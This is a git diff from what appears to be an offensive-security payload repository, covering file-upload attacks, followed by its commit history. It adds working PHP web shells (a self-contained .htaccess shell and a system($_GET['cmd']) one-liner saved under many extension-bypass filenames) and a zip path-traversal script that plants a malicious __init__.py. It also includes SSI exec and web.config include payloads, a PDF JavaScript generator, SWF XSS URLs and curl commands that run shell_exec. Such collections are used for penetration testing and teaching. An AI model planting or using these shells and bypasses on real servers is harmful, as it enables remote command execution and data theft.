--- a/JS/poc.js
+++ b/JS/poc.js
@@ -0,0 +1 @@
 app.alert("XSS")
--- a/JS/poc.py
+++ b/JS/poc.py
@@ -0,0 +1,108 @@
 # FROM https://github.com/osnr/horrifying-pdf-experiments
 import sys
 from pdfrw import PdfWriter
 from pdfrw.objects.pdfname import PdfName
 from pdfrw.objects.pdfstring import PdfString
 from pdfrw.objects.pdfdict import PdfDict
 from pdfrw.objects.pdfarray import PdfArray
 def make_js_action(js):
    action = PdfDict()
    action.S = PdfName.JavaScript
    action.JS = js
    return action
 def make_field(name, x, y, width, height, r, g, b, value=""):
    annot = PdfDict()
    annot.Type = PdfName.Annot
    annot.Subtype = PdfName.Widget
    annot.FT = PdfName.Tx
    annot.Ff = 2
    annot.Rect = PdfArray([x, y, x + width, y + height])
    annot.MaxLen = 160
    annot.T = PdfString.encode(name)
    annot.V = PdfString.encode(value)
    # Default appearance stream: can be arbitrary PDF XObject or
    # something. Very general.
    annot.AP = PdfDict()
    ap = annot.AP.N = PdfDict()
    ap.Type = PdfName.XObject
    ap.Subtype = PdfName.Form
    ap.FormType = 1
    ap.BBox = PdfArray([0, 0, width, height])
    ap.Matrix = PdfArray([1.0, 0.0, 0.0, 1.0, 0.0, 0.0])
    ap.stream = """
 %f %f %f rg
 0.0 0.0 %f %f re f
 """ % (r, g, b, width, height)
    # It took me a while to figure this out. See PDF spec:
    # https://www.adobe.com/content/dam/Adobe/en/devnet/acrobat/pdfs/pdf_reference_1-7.pdf#page=641
    # Basically, the appearance stream we just specified doesn't
    # follow the field rect if it gets changed in JS (at least not in
    # Chrome).
    # But this simple MK field here, with border/color
    # characteristics, _does_ follow those movements and resizes, so
    # we can get moving colored rectangles this way.
    annot.MK = PdfDict()
    annot.MK.BG = PdfArray([r, g, b])
    return annot
 def make_page(fields, script):
    page = PdfDict()
    page.Type = PdfName.Page
    page.Resources = PdfDict()
    page.Resources.Font = PdfDict()
    page.Resources.Font.F1 = PdfDict()
    page.Resources.Font.F1.Type = PdfName.Font
    page.Resources.Font.F1.Subtype = PdfName.Type1
    page.Resources.Font.F1.BaseFont = PdfName.Helvetica
    page.MediaBox = PdfArray([0, 0, 612, 792])
    page.Contents = PdfDict()
    page.Contents.stream = """
 BT
 /F1 24 Tf
 ET
    """
    annots = fields
    page.AA = PdfDict()
    # You probably should just wrap each JS action with a try/catch,
    # because Chrome does no error reporting or even logging otherwise;
    # you just get a silent failure.
    page.AA.O = make_js_action("""
 try {
  %s
 } catch (e) {
  app.alert(e.message);
 }
    """ % (script))
    page.Annots = PdfArray(annots)
    return page
 if len(sys.argv) > 1:
    js_file = open(sys.argv[1], 'r')
    fields = []
    for line in js_file:
        if not line.startswith('/// '): break
        pieces = line.split()
        params = [pieces[1]] + [float(token) for token in pieces[2:]]
        fields.append(make_field(*params))
    js_file.seek(0)
    out = PdfWriter()
    out.addpage(make_page(fields, js_file.read()))
    out.write('result.pdf')
--- a/JS/result.pdf
+++ b/JS/result.pdf
@@ -0,0 +1,48 @@
 %PDF-1.3
 %âãÏÓ
 1 0 obj
 <</Pages 2 0 R /Type /Catalog>>
 endobj
 2 0 obj
 <</Count 1 /Kids [3 0 R] /Type /Pages>>
 endobj
 3 0 obj
 <</AA
  <</O
  <</JS
  (
 try {
  app.alert\("XSS"\)
 } catch \(e\) {
  app.alert\(e.message\);
 }
    )
  /S /JavaScript>>>>
  /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
  /Resources
  <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
  /Type /Page>>
 endobj
 4 0 obj
 <</Length 21>>
 stream
 BT
 /F1 24 Tf
 ET
 endstream
 endobj
 xref
 0 5
 0000000000 65535 f
 0000000015 00000 n
 0000000062 00000 n
 0000000117 00000 n
 0000000424 00000 n
 trailer
 <</Root 1 0 R /Size 5>>
 startxref
 493
 %%EOF
--- a/.htaccess/README.md
+++ b/.htaccess/README.md
@@ -1,10 +1,11 @@
 # .htaccess upload
 Uploading an .htaccess file to override Apache rule and execute PHP.
 "Hackers can also use “.htaccess” file tricks to upload a malicious file with any extension and execute it. For a simple example, imagine uploading to the vulnerabler server an .htaccess file that has AddType application/x-httpd-php .htaccess configuration and also contains PHP shellcode. Because of the malicious .htaccess file, the web server considers the .htaccess file as an executable php file and executes its malicious PHP shellcode. One thing to note: .htaccess configurations are applicable only for the same directory and sub-directories where the .htaccess file is uploaded."
 Self contained .htaccess web shell
-```
+
 ```python
 # Self contained .htaccess web shell - Part of the htshell project
 # Written by Wireghoul - http://www.justanotherhacker.com
@@ -17,11 +18,14 @@ Allow from all
 # Make .htaccess file be interpreted as php file. This occur after apache has interpreted
 # the apache directoves from the .htaccess file
 AddType application/x-httpd-php .htaccess
 ###### SHELL ###### <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>###### LLEHS ######
 ```
 ```php
 ###### SHELL ######
 <?php echo "\n";passthru($_GET['c']." 2>&1"); ?>
 ```
 ## Thanks to
-* [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen ](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
+
 * [ATTACKING WEBSERVERS VIA .HTACCESS - By Eldar Marcussen](http://www.justanotherhacker.com/2011/05/htaccess-based-attacks.html)
 * [](https://blog.qualys.com/securitylabs/2015/10/22/unrestricted-file-upload-vulnerability)
--- a/Extension/shell.jpeg.php
+++ b/Extension/shell.jpeg.php
--- a/Extension/shell.jpg.php
+++ b/Extension/shell.jpg.php
--- a/Extension/shell.php3
+++ b/Extension/shell.php3
--- a/Extension/shell.php4
+++ b/Extension/shell.php4
--- a/Extension/shell.php5
+++ b/Extension/shell.php5
--- a/Extension/shell.php7
+++ b/Extension/shell.php7
--- a/Extension/shell.phpt
+++ b/Extension/shell.phpt
--- a/Extension/Shell.phtml
+++ b/Extension/Shell.phtml
--- a/Extension/Shell.png.php
+++ b/Extension/Shell.png.php
--- a/Extension/shell.png.php
+++ b/Extension/shell.png.php
--- a/Extension/shell.shtml
+++ b/Extension/shell.shtml
@@ -0,0 +1 @@
 <?php echo "Shell";system($_GET['cmd']); ?>
--- a/init.py/python-generate-init.py
+++ b/init.py/python-generate-init.py
@@ -15,5 +15,5 @@ for d in directories:
    z_info = zipfile.ZipInfo(r"../"+d+"/__init__.py")
    z_file = zipfile.ZipFile(name, mode="w") # "/home/swissky/Bureau/"+
    z_file.writestr(z_info, "import os;print 'Shell';os.system('ls');")
-    z_info.external_attr = 0777 << 16L
+    z_info.external_attr = 0o777 << 16
    z_file.close()
--- a/files/README.md
+++ b/files/README.md
@@ -1,16 +1,20 @@
 # Upload
 Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.
 ## Exploits
-Image Tragik
+
-```
+### Image Tragik
 ```powershell
 HTTP Request
 Reverse Shell
 Touch command
 ```
-PHP Extension
+### PHP Extension
-```
+
 ```powershell
 .php
 Less known extension
@@ -24,26 +28,30 @@ Double extension
 .png.php
 ```
-PNG Bypass a resize - Upload the picture and use a local file inclusion
+### PNG Bypass a resize
-```
+
 Upload the picture and use a local file inclusion
 ```powershell
 You can use it by specifying $_GET[0] as shell_exec and passing a $_POST[1] parameter with the shell command to execute.
 curl 'http://localhost/b.php?0=shell_exec' --data "1='ls'"
 curl 'http://localhost/test.php?0=system' --data "1='ls'"
 ```
-JPG Bypass a resize - Upload the picture and use a local file inclusion
+### JPG Bypass a resize
-```
+
 Upload the picture and use a local file inclusion
 ```powershell
 http://localhost/test.php?c=ls
 ```
-XSS via SWF
+### XSS via SWF
 ```
 As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
 As you may already know, it is possible to make a website vulnerable to XSS if you can upload/include a SWF file into that website. I am going to represent this SWF file that you can use in your PoCs.
 This method is based on [1] and [2], and it has been tested in Google Chrome, Mozilla Firefox, IE9/8; there should not be any problem with other browsers either.
-Examples:
+```powershell
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
 IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e){ window.open(‘?js=history.go(-1)’,’_self’);}
@@ -52,4 +60,5 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
 ```
 ## Thanks to
 * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil
--- a/Include/exec.shtml
+++ b/Include/exec.shtml
@@ -0,0 +1 @@
 <!--#exec cmd="whoami" -->
--- a/Include/include.shtml
+++ b/Include/include.shtml
@@ -0,0 +1 @@
 <!--#include file="..\..\web.config" -->
--- a/Show More
+++ b/Show More
Author	SHA1	Message	Date
Swissky	3522d9a674	Files JPEG -> JPG + Tag v2	2018-11-17 14:40:12 +01:00
Swissky	af9abc6592	More CVE - RCE : Jenkins, JBoss, WebLogic, WebSphere	2018-11-15 23:13:08 +01:00
Swissky	15fe34052b	Ruby Deserialization	2018-11-13 23:38:40 +01:00
Swissky	d181ff4e79	Deserialization - merging Java, PHP	2018-11-13 23:25:18 +01:00
Swissky	ddfdc51e68	Credit fix - WAF bypass	2018-11-09 12:43:30 +01:00
Swissky	1b2ee3e67a	Subdomain enumeration - New Aquatone (Go)	2018-11-05 13:45:52 +01:00
Swissky	6bcb43e39c	LDAP fix typo + LDAP attributes + LFI filter chaining	2018-11-02 13:50:56 +01:00
Swissky	86db6b7f6f	Polyglot XSS from @filedescriptor's Polyglot Challenge	2018-10-31 23:41:11 +01:00
Swissky	4b7fe437a5	LDAP userPassword attribute	2018-10-31 22:34:10 +01:00
Swissky	add00c7357	JWT JSON Web Token + SSI files	2018-10-29 22:22:10 +01:00
Swissky	7b919e4492	AWS cp files and grant access with ACL	2018-10-20 17:03:13 +02:00
Swissky	f1eefd2722	Script Docker RCE	2018-10-18 17:32:01 +02:00
Swissky	f8019e2234	Merge pull request #27 from timwis/patch-1 Remove gender-specific pronoun for attacker	2018-10-11 09:09:42 +02:00
Tim Wisniewski	4f6841ed17	Remove gender-specific pronoun for attacker Wouldn't want anyone to think they can't grow up to be an attacker too! :)	2018-10-10 23:54:18 -04:00
Swissky	ea1c3a7ccb	Merge pull request #26 from Techbrunch/patch-1 Add Rancher Metadata Service	2018-10-08 23:02:35 +02:00
Techbrunch	78103d13a1	Add Rancher Metadata Service	2018-10-08 21:46:57 +02:00
Swissky	35d4139373	WebCache param miner file + Reverse shell Python TTY	2018-10-08 13:49:50 +02:00
Swissky	869b29195b	SQLmap --crawl, --form	2018-10-04 19:59:11 +02:00
Swissky	f0a8b6f8b8	Koadic cheatsheet renamed to "Windows - Post Exploitation"	2018-10-04 17:39:55 +02:00
Swissky	9ebf2057c5	Koadic Cheatsheet + Linux persistence in startup .desktop file	2018-10-04 17:35:57 +02:00
Swissky	747f1d172c	Reverse shell python for Windows + Lua + Awk	2018-10-02 17:17:03 +02:00
Swissky	824d8c370b	Bugfix README + Can I take over xyz	2018-10-02 16:57:01 +02:00
Swissky	1c5f8889bd	Network Discovery and Subdomains enumerations	2018-10-02 16:17:16 +02:00
Swissky	b315252c89	LFI - Intruder files (Windows,Linux,Logs...)	2018-10-01 17:11:51 +02:00
Swissky	a3975ab261	SQLmap TOR + Cookie + Proxy	2018-10-01 16:03:07 +02:00
Swissky	7b49f1b13a	PHP Serialization - phpggc	2018-10-01 12:30:14 +02:00
Swissky	6ca5ff1703	PHP Serialization Auth Bypass - Merge pull request #25 from noraj/patch-2 add auth bypass	2018-09-26 18:04:08 +02:00
Alexandre ZANNI	3cf806c8ff	2nd unserialize payload	2018-09-26 00:13:19 +02:00
Alexandre ZANNI	d49e40b1b2	add auth bypass	2018-09-25 23:59:29 +02:00
Swissky	1a1a48c725	Web Cache Deception details from SI9INT's blogpost	2018-09-23 20:07:19 +02:00
Swissky	8bef006d7f	MSSQL Comments - Merge pull request #24 from Margular/patch-1 add comments	2018-09-22 23:12:23 +02:00
时雨	20c1e5c075	add comments	2018-09-23 02:30:03 +08:00
Swissky	cce0444245	SQL injection - Intruders payloads	2018-09-21 18:44:32 +02:00
Swissky	699d66d701	Merge pull request #23 from noraj/patch-1 routed injection in ToC	2018-09-21 18:42:32 +02:00
Alexandre ZANNI	a1eb693270	routed injection in ToC	2018-09-20 23:52:07 +02:00
Swissky	7a80647e63	Raw MD5 SQL injection + SSH Konami Code	2018-09-10 23:12:29 +02:00
Swissky	2a080f82e6	Cassandra SQL + XSS MD + PHP Type Juggling	2018-09-10 20:40:43 +02:00
Swissky	90f4c3634e	PDF JS	2018-09-06 20:28:30 +02:00
Swissky	beb0ce8c54	Linux Persistence + WebLogic RCE	2018-09-03 18:41:05 +02:00
Swissky	011baa7321	Merge pull request #22 from cclauss/patch-1 Use octal numbers that work in both Python 2 and 3	2018-09-02 15:57:48 +02:00
cclauss	d642980f8c	Use octal numbers that work in both Python 2 and 3 python2 -c "print(0777 << 16L == 0o777 << 16)" # True	2018-09-02 14:09:55 +02:00
Swissky	d847e2e6bb	Merge pull request #21 from cclauss/patch-1 import string in uploadlfi.py	2018-09-02 13:54:45 +02:00
cclauss	150110a96c	import string in uploadlfi.py __string__ is used twice on line 13 but it is never imported.	2018-09-02 13:24:35 +02:00
Swissky	64e577b650	CSP bypass fix link	2018-09-01 15:38:57 +02:00
Swissky	fe52b32af8	XSS CSP Bypass + PostgreSQL read/write	2018-09-01 15:36:33 +02:00
Swissky	c38adaded3	CVE Apache Struts + XSS in Python Notebook	2018-08-28 18:48:26 +02:00
Swissky	2a54753d11	Merge pull request #20 from developersatyendra/master latest Apache struts CVE 2018 exploit added	2018-08-28 18:37:17 +02:00
developersatyendra	e2bd481882	Rename ApacheStrutsV3.py to ApacheStrutsV3-2018.py	2018-08-28 03:15:10 -04:00
developersatyendra	72e73e38c2	Created ApacheStrutsV3.py added latest apache struts exploit which is written by @s1kr10s	2018-08-28 03:14:40 -04:00
Swissky	f612a91bb5	LFI via Upload (race condition) + Network Pivot nmap	2018-08-26 15:43:26 +02:00
Swissky	b2faf8c747	SSRF bugfix picture	2018-08-23 19:16:38 +02:00
Swissky	2b7acbc493	SSRF - Bad Parsers	2018-08-23 19:15:15 +02:00
Swissky	0c707c4188	ImageTragick v2 + Angular 1.6+ XSS	2018-08-22 21:42:25 +02:00
Swissky	fe7314444c	Phar Wrapper - "unserialize"	2018-08-19 18:47:32 +02:00
Swissky	cfbe1a4469	SSRF Docker & Kubernetes	2018-08-19 16:32:26 +02:00
Swissky	e11339e669	Markdown formatting - Part 3	2018-08-13 13:07:37 +02:00
Swissky	b87e14a0ed	Markdown formatting - Part 2	2018-08-13 12:01:13 +02:00
Swissky	65654f81a4	Markdown formatting update	2018-08-12 23:30:22 +02:00
Swissky	177c12cb79	Multiple update in READMEs + RCE tricks	2018-08-12 00:17:58 +02:00
Swissky	b20cdde4d9	Adding soffensive's windowsblindread file	2018-08-03 17:56:29 +02:00
Swissky	644724396f	LaTeX display code + XSS location alternative	2018-08-01 21:19:18 +02:00
Swissky	dcc5ebd3b6	Merge branch 'master' of https://github.com/swisskyrepo/PayloadsAllTheThings	2018-07-31 19:23:13 +02:00
Swissky	ce1096830d	Merge pull request #19 from Isopach/Isopach-patch-1 Update README.md	2018-07-31 13:28:31 +02:00
Isopach	8e26277407	Update README.md Correct misspelling	2018-07-31 18:02:38 +09:00
		`@@ -0,0 +1 @@`
							`<?php echo "Shell";system($_GET['cmd']); ?>`